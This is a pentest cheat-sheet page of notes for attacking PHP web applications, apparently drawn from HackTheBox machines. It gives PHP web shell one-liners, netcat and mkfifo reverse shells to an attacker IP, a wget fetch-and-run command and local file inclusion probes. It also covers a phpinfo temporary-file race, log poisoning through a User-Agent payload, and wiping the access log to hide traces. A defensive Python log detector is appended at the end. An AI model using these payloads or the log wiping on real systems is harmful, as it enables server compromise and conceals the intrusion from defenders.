# php

## Basics

* Combined with a [Local File Inclusion](https://pentest.mxhx.org/04-webapps/lfi), you can make PHP give you a shell
* REF: [phpLite](https://pentest.mxhx.org/04-webapps/phplite), ninevehHTB, [WebInjections](https://pentest.mxhx.org/04-webapps/03-webapp), [ReverseShells](https://pentest.mxhx.org/03-getting-in/03-reverseshell-php#php-web-shell)
* Make sure to URL Encode your Injection with [Burp](https://pentest.mxhx.org/02-scanning/burp#url-encode) or [MeyerWeb](https://meyerweb.com/eric/tools/dencoder/)

## Reverse Shell

* Two options to try:

```
<?php system($_GET["cmd"]); ?>               ..should work
<?php echo system($_REQUEST ["cmd"]); ?>     ..one I normally see

http://web/hi.php?notes=/../note.php&cmd=nc -e /bin/sh 10.x.x.x 4444
http://web/hi.php?notes=/../note.php&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 4444 > /tmp/f
```

## Downloading

```
<?php system("wget $IP/shell.php -O /tmp/shell.php; php /tmp/shell.php"); ?>
```

## php explore

* REF: poisonHTB

```
https://$IP/phpinfo.php                 ..Found: file_uploads 'On'
https://$IP/browse.php                  ..page can run local php scripts
https://$IP/browse.php?file=Hello       ..fail
https://$IP/browse.php?file=index.php   ..ok

Encode to view Source:
https://$IP/browse.php?file=php://filter/convert.base64-encode/resource=index.php   ..encodes b64
echo PD9waHAKcHJ.. | base64 -d  ..<?php print_r(ini_get_all());?>

https://$IP/browse.php?file=http://$MyIP/Anyfile   ..http wrapper disabled
https://$IP/browse.php?file=ftp://$MyIP/Anyfile    ..ftp wrapper disabled
https://$IP/browse.php?file=expect://ls            ..unable to find wrapper
https://$IP/browse.php?file=/etc/passwd            ..ok (found username)
```

## phpinfo - fileupload - vulnerability

* Check options for: **phpinfo.php**
* If `file_uploads = On`, PHP will accept any file you POST to it.
* PHP saves the upload to a temporary directory (normally not readable by users) and removes it when the request finishes.
* But with an LFI you may be able to include that temporary file and get code execution
* Test with Burp Intercept:

```
POST /phpinfo.php HTTP/1.1
Content-Type: multipart/form-data; boundary=--HelloWorld

----HelloWorld
Content-Disposition: form-data; name="blah"; filename="TestFile"
Content-Type: text/plain

Does this work
----HelloWorld--

View phpinfo results to see if our file was accepted:
"PHP Variables"            ..header
_FILES("blah")             ..found!
```

## phpinfo - LFI

* <https://insomniasec.com/cdn-assets/LFI_With_PHPInfo_Assistance.pdf>
* GitHub > [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) > FileInclusion > **phpinfolfi.py**

```
---------------------
---------------------
Replace the PAYLOAD with a full reverse-payload
PAYLOAD="""$s\r<?php...;?> \r""" % TAG
(keep all the weird bits.. just focus on swapping the php line)
<?php...;?>

---------------------
---------------------
locate php-reverse
php-reverse-shell.php
paste into phpinfolfi.py as 'payload'
<?php...?>
update ip, port
del comments
LFIREQ="""GET... /browse.php?file=%s HTTP/1.1\r
i = d.find("[tmp_name] =>")    ..problem
i = d.find("[tmp_name] =&gt")  ..fixed twice in script

---------------------
---------------------
python phpinfolfi.py $IP 80 100
.. port 80
.. threads 100

nc -nvlp 9001  ..got a shell
```

## Log Poisoning

* Submit an evil log entry (custom User-Agent)
* Execute it by viewing the log through the LFI
* If the PHP tags do not appear in the included output, they were interpreted, so our injected payload runs
* REF: [php](https://pentest.mxhx.org/04-webapps/php-tricks), poisonHTB

```
TEST 1

View Log:
https://$IP/browse.php can include /var/log/httpd-access.log
curl https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log

Burp > Repeater > Custom "User-Agent"
https://$IP/doesntmatter
User-Agent: Hello World

Confirm:
Notice "Hello World" was sent as the User-Agent
We have control over this field, and we can send malicious payload here
```

```
TEST 2

Burp > Repeater > Custom "User-Agent"
https://$IP/doesntmatter
User-Agent: <?php echo('Hello World'); ?>

https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log
We see "Hello World" in the log
PHP tags were interpreted (ie: we don't see them written in plain text)
Meaning we have execution!
```

```
EXPLOIT

Burp > Repeater > Custom "User-Agent"
GET /doesntmatter HTTP/1.1
User-Agent: <?php system($_REQUEST['cmd']) ?>

https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=hostname
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=ls -la
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=uname -a
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i|nc 10.x.x.x 4444 >/tmp/f
(might need burp url-encode)

nc -nvlp 4444  ..connected!
```

```
bsd reverse netcat
bsd doesn't like the 'normal' reverse

normal:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 9002 >/tmp/f

bsd version:
mkfifo /tmp/f;cat /tmp/f|/bin/sh -i |nc 10.x.x.x 4444 >/tmp/f            ..ippsec
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i|nc 10.x.x.x 4444 >/tmp/f   ..maybe
```

```
Log issue:

vi /var/log/httpd-access.log
delete our bad-line from earlier mistake, oops
because we used echo "Hello World" with double-quotes

Wipe the log file:
echo "" > httpd-access.log
```
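From the defender's side, the probes in "php explore" and the poisoned User-Agent above all leave traces in the web server access log. The detector below is an added example (not from the original notes): it parses constructed Apache combined-format lines and flags stream wrappers and local paths in the `file=` parameter, PHP open tags in client-controlled headers, and a log file being included together with a `cmd` parameter. The `browse.php` and `file=` names are taken from the notes; everything else is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache "combined" format, modelled on the
# browse.php?file= probes and the poisoned User-Agent from the notes above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /browse.php?file=index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /browse.php?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /browse.php?file=/etc/passwd HTTP/1.1" 200 1400 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /doesntmatter HTTP/1.1" 404 200 "-" "<?php system($_REQUEST['cmd']) ?>"
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=hostname HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "curl/8.0"
"""

# One combined-format line: ip ident user [time] "method target proto" status bytes "referer" "ua"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')
PHP_TAG = re.compile(r'<\?')   # any PHP open tag in a header the server logs verbatim
WRAPPER = re.compile(r'^(php|expect|data|phar|zip|ftp|https?)://', re.I)
SENSITIVE = ('/var/log/', '/etc/passwd', '/proc/self/', '../')

def classify(line):
    """Return finding tags for one access-log line (empty list if nothing suspicious)."""
    m = LINE_RE.match(line)
    if not m:
        return ['unparsed']
    findings = []
    # Log poisoning: PHP code placed in a client-controlled header.
    if PHP_TAG.search(m['ua']) or PHP_TAG.search(m['referer']):
        findings.append('php-tag-in-header')
    query = parse_qs(urlsplit(m['target']).query, keep_blank_values=True)  # percent-decodes values
    for value in query.get('file', []):
        if WRAPPER.match(value):
            findings.append('stream-wrapper')        # php://filter, expect://, remote includes
        if any(marker in value for marker in SENSITIVE):
            findings.append('lfi-path')              # traversal or a file outside the web root
        if '/var/log/' in value and 'cmd' in query:
            findings.append('poisoned-log-include')  # log included alongside a command parameter
    return findings

def scan(log_text):
    """Return [(line_number, findings)] for every line that produced a finding."""
    return [(n, f) for n, line in enumerate(log_text.splitlines(), 1)
            if (f := classify(line))]

if __name__ == '__main__':
    for number, findings in scan(SAMPLE_LOG):
        print(number, ', '.join(findings))
```

Run it against a real access log by replacing `SAMPLE_LOG` with the file contents; the `poisoned-log-include` tag is the one worth alerting on, since it marks the request that turns a stored payload into execution.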
